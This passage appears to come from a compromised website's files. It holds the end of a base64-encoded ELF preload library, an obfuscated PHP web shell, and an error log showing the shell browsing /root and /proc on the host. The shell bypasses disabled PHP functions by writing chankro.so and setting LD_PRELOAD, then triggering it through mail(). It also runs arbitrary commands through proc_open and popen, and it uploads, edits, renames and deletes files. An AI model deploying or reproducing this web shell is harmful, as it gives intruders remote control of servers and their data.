/gNIifBIweg/SAHGSNH+dBhIiwWhByAASIXAdAxd/+BmDx+EAAAAAABdww8fQABmLg8fhAAAAAAAgD3xByAAAHUnSIM9dwcgAABVSInldAxIiz3SByAA6D3////oSP///13GBcgHIAAB88MPH0AAZi4PH4QAAAAAAEiNPVkFIABIgz8AdQvpXv///2YPH0QAAEiLBRkHIABIhcB06VVIieX/0F3pQP///1VIieVIjT16AAAA6FD+//++/wEAAEiJx+iT/v//SI09YQAAAOg3/v//SInH6E/+//+QXcNVSInlvgEAAAC/AQAAAOhZ/v//6JT+//+FwHQKvwAAAADodv7//5Bdw1VIieVIjT0lAAAA6FP+///o/v3//+gZ/v//kF3DAABIg+wISIPECMNDSEFOS1JPAExEX1BSRUxPQUQAARsDOzQAAAAFAAAAuP3//1AAAABY/v//eAAAAGj///+QAAAAnP///7AAAADF////0AAAAAAAAAAUAAAAAAAAAAF6UgABeBABGwwHCJABAAAkAAAAHAAAAGD9//+gAAAAAA4QRg4YSg8LdwiAAD8aOyozJCIAAAAAFAAAAEQAAADY/f//CAAAAAAAAAAAAAAAHAAAAFwAAADQ/v//NAAAAABBDhCGAkMNBm8MBwgAAAAcAAAAfAAAAOT+//8pAAAAAEEOEIYCQw0GZAwHCAAAABwAAACcAAAA7f7//x0AAAAAQQ4QhgJDDQZYDAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsAgAAAAAAAAAAAAAAAAAAHAIAAAAAAAAAAAAAAAAAAABAAAAAAAAALsAAAAAAAAADAAAAAAAAAAYBwAAAAAAAA0AAAAAAAAAXAkAAAAAAAAZAAAAAAAAAPgNIAAAAAAAGwAAAAAAAAAQAAAAAAAAABoAAAAAAAAACA4gAAAAAAAcAAAAAAAAAAgAAAAAAAAA9f7/bwAAAADwAQAAAAAAAAUAAAAAAAAAMAQAAAAAAAAGAAAAAAAAADgCAAAAAAAACgAAAAAAAADpAAAAAAAAAAsAAAAAAAAAGAAAAAAAAAADAAAAAAAAAAAQIAAAAAAAAgAAAAAAAADYAAAAAAAAABQAAAAAAAAABwAAAAAAAAAXAAAAAAAAAEAGAAAAAAAABwAAAAAAAABoBQAAAAAAAAgAAAAAAAAA2AAAAAAAAAAJAAAAAAAA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AAAAAAAAAAAA/QEAACAAAAAAAAAAAAAAAAAAAAAAAAAAFwIAACIAAAAAAAAAAAAAAAAAAAAAAAAAMwIAABIACQAYBwAAAAAAAAAAAAAAAAAAOQIAABIAAAAAAAAAAAAAAAAAAAAAAAAAAGNydHN0dWZmLmMAX19KQ1JfTElTVF9fAGRlcmVnaXN0ZXJfdG1fY2xvbmVzAF9fZG9fZ2xvYmFsX2R0b3JzX2F1eABjb21wbGV0ZWQuNjk3MgBfX2RvX2dsb2JhbF9kdG9yc19hdXhfZmluaV9hcnJheV9lbnRyeQBmcmFtZV9kdW1teQBfX2ZyYW1lX2R1bW15X2luaXRfYXJyYXlfZW50cnkAaG9vay5jAF9fRlJBTUVfRU5EX18AX19KQ1JfRU5EX18AX19kc29faGFuZGxlAF9EWU5BTUlDAF9fR05VX0VIX0ZSQU1FX0hEUgBfX1RNQ19FTkRfXwBfR0xPQkFMX09GRlNFVF9UQUJMRV8AZ2V0ZW52QEBHTElCQ18yLjIuNQBfSVRNX2RlcmVnaXN0ZXJUTUNsb25lVGFibGUAX2VkYXRhAGRhZW1vbml6ZQBfZmluaQBzeXN0ZW1AQEdMSUJDXzIuMi41AHB3bgBzaWduYWxAQEdMSUJDXzIuMi41AF9fZ21vbl9zdGFydF9fAHByZWxvYWRtZQBfZW5kAF9fYnNzX3N0YXJ0AGNobW9kQEBHTElCQ18yLjIuNQBfSnZfUmVnaXN0ZXJDbGFzc2VzAHVuc2V0ZW52QEBHTElCQ18yLjIuNQBleGl0QEBHTElCQ18yLjIuNQBfSVRNX3JlZ2lzdGVyVE1DbG9uZVRhYmxlAF9fY3hhX2ZpbmFsaXplQEBHTElCQ18yLjIuNQBfaW5pdABmb3JrQEBHTElCQ18yLjIuNQAALnN5bXRhYgAuc3RydGFiAC5zaHN0cnRhYgAubm90ZS5nbnUuYnVpbGQtaWQALmdudS5oYXNoAC5keW5zeW0ALmR5bnN0cgAuZ251LnZlcnNpb24ALmdudS52ZXJzaW9uX3IALnJlbGEuZHluAC5yZWxhLnBsdAAuaW5pdAAucGx0LmdvdAAudGV4dAAuZmluaQAucm9kYXRhAC5laF9mcmFtZV9oZHIALmVoX2ZyYW1lAC5pbml0X2FycmF5AC5maW5pX2FycmF5AC5qY3IALmR5bmFtaWMALmdvdC5wbHQALmRhdGEALmJzcwAuY29tbWVudAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABsAAAAHAAAAAgAAAAAAAADIAQAAAAAAAMgBAAAAAAAAJAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAuAAAA9v//bwIAAAAAAAAA8AEAAAAAAADwAQAAAAAAAEQAAAAAAAAAAwAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAOAAAAAsAAAACAAAAAAAAADgCAAAAAAAAOAIAAAAAAAD4AQAAAAAAAAQAAAABAAAACAAAAAAAAAAYAAAAAAAAAEAAAAADAAAAAgAAAAAAAAAwBAAAAAAAADAEAAAAAAAA6QAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAABIAAAA////bwIAAAAAAAAAGgUAAAAAAAAaBQAAAAAAACoAAAAAAAAAAwAAAAAAAAACAAAAAAAAAAIAAAAAAAAAVQAAAP7//28CAAAAAAAAAEgFAAAAAAAASAUAAAAAAAAgAAAAAAAAAAQAAAABAAAACAAAAAAAAAAAAAAAAAAAAGQAAAAEAAAAAgAAAAAAAABoBQAAAAAAAGgFAAAAAAAA2AAAAAAAAAADAAAAAAAAAAgAAAAAAAAAGAAAAAAAAABuAAAABAAAAEIAAAAAAAAAQAYAAAAAAABABgAAAAAAANgAAAAAAAAAAwAAABYAAAAIAAAAAAAAABgAAAAAAAAAeAAAAAEAAAAGAAAAAAAAABgHAAAAAAAAGAcAAAAAAAAXAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAHMAAAABAAAABgAAAAAAAAAwBwAAAAAAADAHAAAAAAAAoAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAB+AAAAAQAAAAYAAAAAAAAA0AcAAAAAAADQBwAAAAAAAAgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAhwAAAAEAAAAGAAAAAAAAAOAHAAAAAAAA4AcAAAAAAAB6AQAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAI0AAAABAAAABgAAAAAAAABcCQAAAAAAAFwJAAAAAAAACQAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAACTAAAAAQAAAAIAAAAAAAAAZQkAAAAAAABlCQAAAAAAABMAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAmwAAAAEAAAACAAAAAAAAAHgJAAAAAAAAeAkAAAAAAAA0AAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAKkAAAABAAAAAgAAAAAAAACwCQAAAAAAALAJAAAAAAAAvAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAACzAAAADgAAAAMAAAAAAAAA+A0gAAAAAAD4DQAAAAAAABAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAAvwAAAA8AAAADAAAAAAAAAAgOIAAAAAAACA4AAAAAAAAIAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAAMsAAAABAAAAAwAAAAAAAAAQDiAAAAAAABAOAAAAAAAACAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAADQAAAABgAAAAMAAAAAAAAAGA4gAAAAAAAYDgAAAAAAAMABAAAAAAAABAAAAAAAAAAIAAAAAAAAABAAAAAAAAAAggAAAAEAAAADAAAAAAAAANgPIAAAAAAA2A8AAAAAAAAoAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAANkAAAABAAAAAwAAAAAAAAAAECAAAAAAAAAQAAAAAAAAYAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAACAAAAAAAAADiAAAAAQAAAAMAAAAAAAAAYBAgAAAAAABgEAAAAAAAAAgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAA6AAAAAgAAAADAAAAAAAAAGgQIAAAAAAAaBAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAO0AAAABAAAAMAAAAAAAAAAAAAAAAAAAAGgQAAAAAAAALQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAABAAAAAgAAAAAAAAAAAAAAAAAAAAAAAACYEAAAAAAAABgGAAAAAAAAGwAAAC0AAAAIAAAAAAAAABgAAAAAAAAACQAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAsBYAAAAAAABLAgAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAABEAAAADAAAAAAAAAAAAAAAAAAAAAAAAAPsYAAAAAAAA9gAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAA='; $cmdd = $_POST['cmd_input']; $meterpreter = $en($cmdd." > test.txt"); $viewC0MM4NDResult = '<hr><p>R3SULT: <font color="white">base64 : ' . $meterpreter .'</br>Please Refresh and Check F1L3 test.txt, this output command<br>test.txt created = VULN<br>test.txt not created = NOT VULN<br>example access: domain.com/yourpath/path/test.txt<br>Powered By Tobanga</font><br><br></textarea>'; $a($full . '/chankro.so', $base($hook)); $a($full . '/acpid.socket', $base($meterpreter)); $p('CHANKRO=' . $full . '/acpid.socket'); $p('LD_PRELOAD=' . $full . '/chankro.so'); if(function_exists('mail')) { $m('a','a','a','a'); } elseif(function_exists('mb_send_mail')) { $mb('a','a','a','a'); } elseif(function_exists('error_log')) { $err('a',1,'a'); } elseif(function_exists('imap_mail')) { $imp('a','a','a'); } }elseif (isset($_POST['delete_file'])) { $fileToD3L3T3 = $currentDirectory . '/' . $_POST['delete_file']; if (file_exists($fileToD3L3T3)) { if (is_dir($fileToD3L3T3)) { if (deleteDirectory($fileToD3L3T3)) { echo '<hr>F0LD3R D3L3T3D SUCCESSFULLY!'; } else { echo '<hr>ERR0R: F4IL3D T0 D3L3TE F0LDER!'; } } else { if ($unl($fileToD3L3T3)) { echo '<hr>F1L3 D3L3T3D SUCCESSFULLY!'; } else { echo '<hr>ERR0R: F4IL3D T0 D3L3TE F1L3!'; } } } else { echo '<hr>ERROR: F1L3 OR D1R3CTORY N0T F0UND!'; } } elseif (isset($_POST['rename_item']) && isset($_POST['old_name']) && isset($_POST['new_name'])) { $oldN4M3 = $currentDirectory . '/' . $_POST['old_name']; $newN4M3 = $currentDirectory . '/' . $_POST['new_name']; if (file_exists($oldN4M3)) { if (rename($oldN4M3, $newN4M3)) { echo '<hr>IT3M R3N4M3D SUCCESSFULLY!'; } else { echo '<hr>ERR0R: F4IL3D TO R3N4ME 1TEM!'; } } else { echo '<hr>ERROR: 1T3M N0T F0UND!'; } }elseif (isset($_POST['cmd_biasa'])) { $pp = "p"."r"."o"."c"."_"."o"."p"."e"."n"; $pc = "f"."c"."l"."o"."s"."e"; $ppc = "p"."r"."o"."c"."_"."c"."l"."o"."s"."e"; $stg = "s"."t"."r"."e"."a"."m"."_"."g"."e"."t"."_"."c"."o"."n"."t"."e"."n"."t"."s"; $popx = "p"."o"."p"."e"."n"; $pclose = "p"."c"."l"."o"."s"."e"; $command = $_POST['cmd_biasa']; $descriptorspec = [ 0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['pipe', 'w'] ]; $process = $pp($command, $descriptorspec, $pipes); if (is_resource($process)) { $output = $stg($pipes[1]); $errors = $stg($pipes[2]); $pc($pipes[1]); $pc($pipes[2]); $ppc($process); if (!empty($errors)) { $viewC0MM4NDResult = '<hr><p>ERR0R: </p><textarea class="result-box">' . $htm($errors) . '</textarea>'; } else { $viewC0MM4NDResult = '<hr><p>R3SULT: </p><textarea class="result-box">' . $htm($output) . '</textarea>'; } } else { $handle = $popx($command . " 2>&1", 'r'); if ($handle) { $output = ''; while (!feof($handle)) { $output .= fread($handle, 4096); } $pclose($handle); $viewC0MM4NDResult = '<hr><p>R3SULT: </p><textarea class="result-box">' . htmlspecialchars($output) . '</textarea>'; } else { $viewC0MM4NDResult = '<hr><p>ERR0R: Failed to execute! </p>'; } } } elseif (isset($_POST['view_file'])) { $fileToV13W = $currentDirectory . '/' . $_POST['view_file']; if (file_exists($fileToV13W)) { $fileContent = $fgc($fileToV13W); $viewC0MM4NDResult = '<hr><p>R3SULT: ' . $_POST['view_file'] . '</p> <form method="post" action="?'.(isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '').'"> <textarea name="content" class="result-box">' . $htm($fileContent) . '</textarea><td> <input type="hidden" name="edit_file" value="' . $_POST['view_file'] . '"> <input type="submit" value=" Save "></form></td>'; } else { $viewC0MM4NDResult = '<hr><p>ERR0R: F1L3 N0T F0UND!</p>'; } } elseif (isset($_POST['edit_file'])) { $ef = $currentDirectory . '/' . $_POST['edit_file']; $newContent = $_POST['content']; if ($fpc($ef, $newContent) !== false) { echo '<hr>F1L3 <i style=color:red;>' . $_POST['edit_file'].' 3D1T3D 0K<hr>'; } else { echo '<hr>ERR0R: 3D1T F1L3 <i style=color:red;> ' . $_POST['edit_file'].' F41L3D!<hr>'; } } } echo '<hr>D1R: '; $directories = $expl(DIRECTORY_SEPARATOR, $currentDirectory); $currentPath = ''; $homeLinkPrinted = false; foreach ($directories as $index => $dir) { $currentPath .= DIRECTORY_SEPARATOR . $dir; if ($index == 0) { echo '/<a href="?d=' . x($currentPath) . '">' . $dir . '</a>'; } else { echo '/<a href="?d=' . x($currentPath) . '">' . $dir . '</a>'; } } echo '<a href="?d=' . x($scriptDirectory) . '"><font style="color:white";>/</font> <span style="color: white;">-> H0M3</span></a>'; echo '<br>'; echo '<hr><form method="post" enctype="multipart/form-data">'; echo '<input type="file" name="filetos" id="filetos" placeholder="pilih file:">'; echo '<input type="submit" value="UPL04D!" name="submit">'; echo '</form><hr>'; echo '<table border="5"><tbody> <tr> <td> <center>C0MM4ND [byp4ss]<form method="post" action="?'.(isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '').'"> <input type="text" name="cmd_input" placeholder="whoami"><input type="submit" value="RUN C0MM4ND"></form></center></td> <td><center>C0MM4ND<form method="post" action="?'.(isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '').'"> <input type="text" name="cmd_biasa" placeholder="whoami"><input type="submit" value="RUN C0MM4ND"></form><center></td> <td><center>CR3AT3 F0LD3R<form method="post" action="?'.(isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '').'"> <input type="text" name="folder_name" placeholder="F0LD3R N4M3"><input type="submit" value="CR3AT3 F0LD3R"></form><center></td> <td><center>CR3AT3 F1L3<form method="post" action="?'.(isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '').'"> <input type="text" name="file_name" placeholder="F1L3 N4M3"><input type="submit" value="CR3AT3 F1L3"></form></td></tr> </tbody></table>'; echo $viewC0MM4NDResult; echo '<table border=1>'; echo '<br><tr><th><center>IT3M N4M3</th><th><center>S1Z3</th><th><center>D4T3</th><th>P3RMISSI0NZ</th><th><center>V13W</th><th><center>D3L3T3</th><th><center>R3NAM3</th></tr></center></center></center>'; foreach ($scd($currentDirectory) as $v) { $u = $ril($v); $s = $st($u); $itemLink = $isdir($v) ? '?d=' . x($currentDirectory . '/' . $v) : '?'.('d='.x($currentDirectory).'&f='.x($v)); $permission = substr(sprintf('%o', fileperms($u)), -4); $writable = $isw($u); echo '<tr> <td class="item-name"><a href="'.$itemLink.'">'.$v.'</a></td> <td class="size">'.filesize($u).'</td> <td class="date" style="text-align: center;">'.date('Y-m-d H:i:s', filemtime($u)).'</td> <td class="permission '.($writable ? 'writable' : 'not-writable').'">'.$permission.'</td> <td><center><form method="post" action="?'.(isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '').'"><input type="hidden" name="view_file" value="'.$htm($v).'"><input type="submit" value=" V13W "></form></center></td> <td><center><form method="post" action="?'.(isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '').'"><input type="hidden" name="delete_file" value="'.$htm($v).'"><input type="submit" value="D3L3T3"></form></center></td> <td><form method="post" action="?'.(isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '').'"><input type="hidden" name="old_name" value="'.$htm($v).'"><input type="text" name="new_name" placeholder="N3W N4M3"><input type="submit" name="rename_item" value="R3NAM3"></form></td> </tr>'; } echo '</table>'; function deleteDirectory($dir) { $unl = "u"."n"."l"."i"."n"."k"; if (!file_exists($dir)) { return true; } if (!is_dir($dir)) { return $unl($dir); } $scd = "s"."c"."a"."n"."d"."i"."r"; foreach ($scd($dir) as $item) { if ($item == '.' || $item == '..') { continue; } if (!deleteDirectory($dir . DIRECTORY_SEPARATOR . $item)) { return false; } } return rmdir($dir); } ?> error_log000064400000041517152137727050006502 0ustar00[15-Jun-2026 12:35:59 UTC] PHP Warning: scandir(//root): failed to open dir: Permission denied in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 170 [15-Jun-2026 12:35:59 UTC] PHP Warning: scandir(): (errno 13): Permission denied in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 170 [15-Jun-2026 12:35:59 UTC] PHP Warning: Invalid argument supplied for foreach() in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 179 [15-Jun-2026 12:35:59 UTC] PHP Warning: Invalid argument supplied for foreach() in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 206 [15-Jun-2026 14:05:52 UTC] PHP Warning: scandir(//proc/2223594): failed to open dir: No such file or directory in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 170 [15-Jun-2026 14:05:52 UTC] PHP Warning: scandir(): (errno 2): No such file or directory in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 170 [15-Jun-2026 14:05:52 UTC] PHP Warning: Invalid argument supplied for foreach() in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 179 [15-Jun-2026 14:05:52 UTC] PHP Warning: Invalid argument supplied for foreach() in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 206 [15-Jun-2026 14:05:53 UTC] PHP Warning: scandir(//proc/2223886): failed to open dir: No such file or directory in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 170 [15-Jun-2026 14:05:53 UTC] PHP Warning: scandir(): (errno 2): No such file or directory in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 170 [15-Jun-2026 14:05:53 UTC] PHP Warning: Invalid argument supplied for foreach() in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 179 [15-Jun-2026 14:05:53 UTC] PHP Warning: Invalid argument supplied for foreach() in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 206 [15-Jun-2026 14:05:57 UTC] PHP Warning: scandir(//proc/2185351): failed to open dir: No such file or directory in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 170 [15-Jun-2026 14:05:57 UTC] PHP Warning: scandir(): (errno 2): No such file or directory in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 170 [15-Jun-2026 14:05:57 UTC] PHP Warning: Invalid argument supplied for foreach() in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 179 [15-Jun-2026 14:05:57 UTC] PHP Warning: Invalid argument supplied for foreach() in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 206 [15-Jun-2026 14:05:58 UTC] PHP Warning: scandir(//proc/2222257): failed to open dir: No such file or directory in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 170 [15-Jun-2026 14:05:58 UTC] PHP Warning: scandir(): (errno 2): No such file or directory in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 170 [15-Jun-2026 14:05:58 UTC] PHP Warning: Invalid argument supplied for foreach() in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 179 [15-Jun-2026 14:05:58 UTC] PHP Warning: Invalid argument supplied for foreach() in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 206 [15-Jun-2026 14:05:58 UTC] PHP Warning: scandir(//proc/2216970): failed to open dir: No such file or directory in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 170 [15-Jun-2026 14:05:58 UTC] PHP Warning: scandir(): (errno 2): No such file or directory in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 170 [15-Jun-2026 14:05:58 UTC] PHP Warning: Invalid argument supplied for foreach() in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 179 [15-Jun-2026 14:05:58 UTC] PHP Warning: Invalid argument supplied for foreach() in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 206 [15-Jun-2026 14:05:59 UTC] PHP Warning: scandir(//proc/2205046): failed to open dir: No such file or directory in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 170 [15-Jun-2026 14:05:59 UTC] PHP Warning: scandir(): (errno 2): No such file or directory in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 170 [15-Jun-2026 14:05:59 UTC] PHP Warning: Invalid argument supplied for foreach() in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 179 [15-Jun-2026 14:05:59 UTC] PHP Warning: Invalid argument supplied for foreach() in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 206 [15-Jun-2026 14:05:59 UTC] PHP Warning: scandir(//proc/2223557): failed to open dir: No such file or directory in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 170 [15-Jun-2026 14:05:59 UTC] PHP Warning: scandir(): (errno 2): No such file or directory in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 170 [15-Jun-2026 14:05:59 UTC] PHP Warning: Invalid argument supplied for foreach() in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 179 [15-Jun-2026 14:05:59 UTC] PHP Warning: Invalid argument supplied for foreach() in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 206 [15-Jun-2026 14:06:00 UTC] PHP Warning: scandir(//opt/cpanel-ccs): failed to open dir: Permission denied in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 170 [15-Jun-2026 14:06:00 UTC] PHP Warning: scandir(): (errno 13): Permission denied in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 170 [15-Jun-2026 14:06:00 UTC] PHP Warning: Invalid argument supplied for foreach() in 